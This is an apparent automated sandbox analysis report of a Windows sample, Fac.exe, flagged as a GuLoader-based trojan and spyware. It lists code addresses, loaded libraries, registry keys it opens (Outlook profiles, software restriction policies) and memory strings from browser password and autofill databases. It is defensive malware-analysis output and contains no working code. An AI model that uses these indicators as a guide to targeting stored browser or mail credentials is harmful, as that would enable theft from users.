Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE8CF0	2_2_36FE8CF0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEE2EF	2_2_36FEE2EF
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEB7EA	2_2_36FEB7EA
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE3FE8	2_2_36FE3FE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEFAE8	2_2_36FEFAE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1FE8	2_2_36FE1FE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE61E5	2_2_36FE61E5
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FECFE0	2_2_36FECFE0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE8CE1	2_2_36FE8CE1
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE0DDF	2_2_36FE0DDF
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEA4D8	2_2_36FEA4D8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEFAD8	2_2_36FEFAD8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE3FD9	2_2_36FE3FD9
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE04D0	2_2_36FE04D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE79D0	2_2_36FE79D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FECFCF	2_2_36FECFCF
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE36C8	2_2_36FE36C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEE7C8	2_2_36FEE7C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEA4C8	2_2_36FEA4C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEBCC0	2_2_36FEBCC0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE79C0	2_2_36FE79C0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE04BF	2_2_36FE04BF
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE56B8	2_2_36FE56B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE91B8	2_2_36FE91B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE36B8	2_2_36FE36B8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEE7B9	2_2_36FEE7B9
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE66B0	2_2_36FE66B0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEBCB0	2_2_36FEBCB0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE91AA	2_2_36FE91AA
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FED4A8	2_2_36FED4A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE56A8	2_2_36FE56A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEA9A0	2_2_36FEA9A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE66A0	2_2_36FE66A0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE2D9A	2_2_36FE2D9A
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE4D98	2_2_36FE4D98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE7E98	2_2_36FE7E98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FED498	2_2_36FED498
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEEC90	2_2_36FEEC90
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEA990	2_2_36FEA990
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE2488	2_2_36FE2488
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEC188	2_2_36FEC188
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE4D89	2_2_36FE4D89
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE7E87	2_2_36FE7E87
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1280	2_2_36FE1280
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE9680	2_2_36FE9680
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEEC7F	2_2_36FEEC7F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE247A	2_2_36FE247A
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE4478	2_2_36FE4478
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE6B78	2_2_36FE6B78
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEC178	2_2_36FEC178
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FED970	2_2_36FED970
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1271	2_2_36FE1271
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE6B6A	2_2_36FE6B6A
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1B68	2_2_36FE1B68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEAE68	2_2_36FEAE68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE4469	2_2_36FE4469
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE0960	2_2_36FE0960
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE8360	2_2_36FE8360
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FED95F	2_2_36FED95F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE3B58	2_2_36FE3B58
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEF158	2_2_36FEF158
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1B58	2_2_36FE1B58
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEAE59	2_2_36FEAE59
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEC650	2_2_36FEC650
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE8350	2_2_36FE8350
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE094F	2_2_36FE094F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE5B48	2_2_36FE5B48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE9B48	2_2_36FE9B48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEF148	2_2_36FEF148
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE3B47	2_2_36FE3B47
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE0040	2_2_36FE0040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE7040	2_2_36FE7040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEC640	2_2_36FEC640
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE3238	2_2_36FE3238
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEDE38	2_2_36FEDE38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE9B38	2_2_36FE9B38
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE5B37	2_2_36FE5B37
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE7032	2_2_36FE7032
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEB330	2_2_36FEB330
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE5228	2_2_36FE5228
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE8828	2_2_36FE8828
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE3228	2_2_36FE3228
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEDE28	2_2_36FEDE28
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEB322	2_2_36FEB322
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEF620	2_2_36FEF620
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE0021	2_2_36FE0021
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE2918	2_2_36FE2918
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FECB18	2_2_36FECB18
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE5218	2_2_36FE5218
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE8818	2_2_36FE8818
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FECB12	2_2_36FECB12
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1710	2_2_36FE1710
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEA010	2_2_36FEA010
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEF60F	2_2_36FEF60F
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEA00A	2_2_36FEA00A
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE4908	2_2_36FE4908
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE7508	2_2_36FE7508
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE2907	2_2_36FE2907
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FEE300	2_2_36FEE300
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36FE1700	2_2_36FE1700
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700F988	2_2_3700F988
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37007FA8	2_2_37007FA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37001828	2_2_37001828
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700F668	2_2_3700F668
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700ED08	2_2_3700ED08
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37000508	2_2_37000508
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37008908	2_2_37008908
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700BB08	2_2_3700BB08
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37003120	2_2_37003120
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700D728	2_2_3700D728
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700A528	2_2_3700A528
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700C138	2_2_3700C138
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700C148	2_2_3700C148
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37008F48	2_2_37008F48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700F348	2_2_3700F348
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37001350	2_2_37001350
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37001360	2_2_37001360
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700AB68	2_2_3700AB68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700DD68	2_2_3700DD68
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700C788	2_2_3700C788
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37009588	2_2_37009588
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700E3A8	2_2_3700E3A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700B1A8	2_2_3700B1A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370009C1	2_2_370009C1
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37009BC8	2_2_37009BC8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700CDC8	2_2_3700CDC8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370009D0	2_2_370009D0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700B7E8	2_2_3700B7E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370085E8	2_2_370085E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700E9E8	2_2_3700E9E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700D408	2_2_3700D408
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700A208	2_2_3700A208
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37000011	2_2_37000011
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37001817	2_2_37001817
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700BE17	2_2_3700BE17
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700F028	2_2_3700F028
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37008C28	2_2_37008C28
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700BE28	2_2_3700BE28
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37000040	2_2_37000040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700A848	2_2_3700A848
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700DA48	2_2_3700DA48
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700C468	2_2_3700C468
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37009268	2_2_37009268
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37000E87	2_2_37000E87
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700E088	2_2_3700E088
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700AE88	2_2_3700AE88
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37000E98	2_2_37000E98
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37009898	2_2_37009898
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700FCA8	2_2_3700FCA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700CAA8	2_2_3700CAA8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370098A8	2_2_370098A8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700B4C8	2_2_3700B4C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370082C8	2_2_370082C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700E6C8	2_2_3700E6C8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37009EE8	2_2_37009EE8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_3700D0E8	2_2_3700D0E8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370004F9	2_2_370004F9
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370436F0	2_2_370436F0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37041470	2_2_37041470
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37043008	2_2_37043008
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37041B50	2_2_37041B50
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37042238	2_2_37042238
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37040D88	2_2_37040D88
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37042920	2_2_37042920
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_370436E0	2_2_370436E0
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37041461	2_2_37041461
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37041B40	2_2_37041B40
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37042228	2_2_37042228
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37040006	2_2_37040006
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37040040	2_2_37040040
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37042FF8	2_2_37042FF8
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37040D79	2_2_37040D79
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37040A00	2_2_37040A00
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37040A10	2_2_37040A10
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37042913	2_2_37042913
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37132638	2_2_37132638
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37131A20	2_2_37131A20
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_37139130	2_2_37139130

Source: C:\Users\user\Desktop\Fac.exe

Code function: String function: 00402C41 appears 51 times

Source: Fac.exe, 00000000.00000002.42428594410.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Fac.exe
Source: Fac.exe, 00000002.00000002.43473702114.0000000033A67000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Fac.exe
Source: Fac.exe, 00000002.00000000.42423705309.000000000044D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Fac.exe
Source: Fac.exe, 00000002.00000002.43463081751.0000000003704000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Fac.exe
Source: Fac.exe	Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Fac.exe

Source: Fac.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5

Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_00403359

Source: C:\Users\user\Desktop\Fac.exe

Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046EC

Source: C:\Users\user\Desktop\Fac.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\Fac.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Fac.exe

File created: C:\Users\user\AppData\Local\Temp\nsq76BA.tmp

Jump to behavior

Source: Fac.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Fac.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Fac.exe, 00000002.00000002.43474377171.0000000033E7D000.00000004.00000800.00020000.00000000.sdmp, Fac.exe, 00000002.00000002.43474377171.0000000033E89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Fac.exe, 00000002.00000002.43476613162.0000000034C53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: Fac.exe

ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\Fac.exe

File read: C:\Users\user\Desktop\Fac.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Fac.exe "C:\Users\user\Desktop\Fac.exe"
Source: C:\Users\user\Desktop\Fac.exe	Process created: C:\Users\user\Desktop\Fac.exe "C:\Users\user\Desktop\Fac.exe"
Source: C:\Users\user\Desktop\Fac.exe	Process created: C:\Users\user\Desktop\Fac.exe "C:\Users\user\Desktop\Fac.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fac.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Fac.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Fac.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.42430985233.0000000006462000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Fac.exe

Code function: 0_2_70171B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70171B63

Source: C:\Users\user\Desktop\Fac.exe	Code function: 0_2_70172FD0 push eax; ret	0_2_70172FFE
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_00159C30 push esp; retf 0017h	2_2_00159D55
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C387E7 pushad ; ret	2_2_36C387EA
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3878F push esi; ret	2_2_36C38792
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C38755 push eax; ret	2_2_36C38756
Source: C:\Users\user\Desktop\Fac.exe	Code function: 2_2_36C3875B push edx; ret	2_2_36C3875E
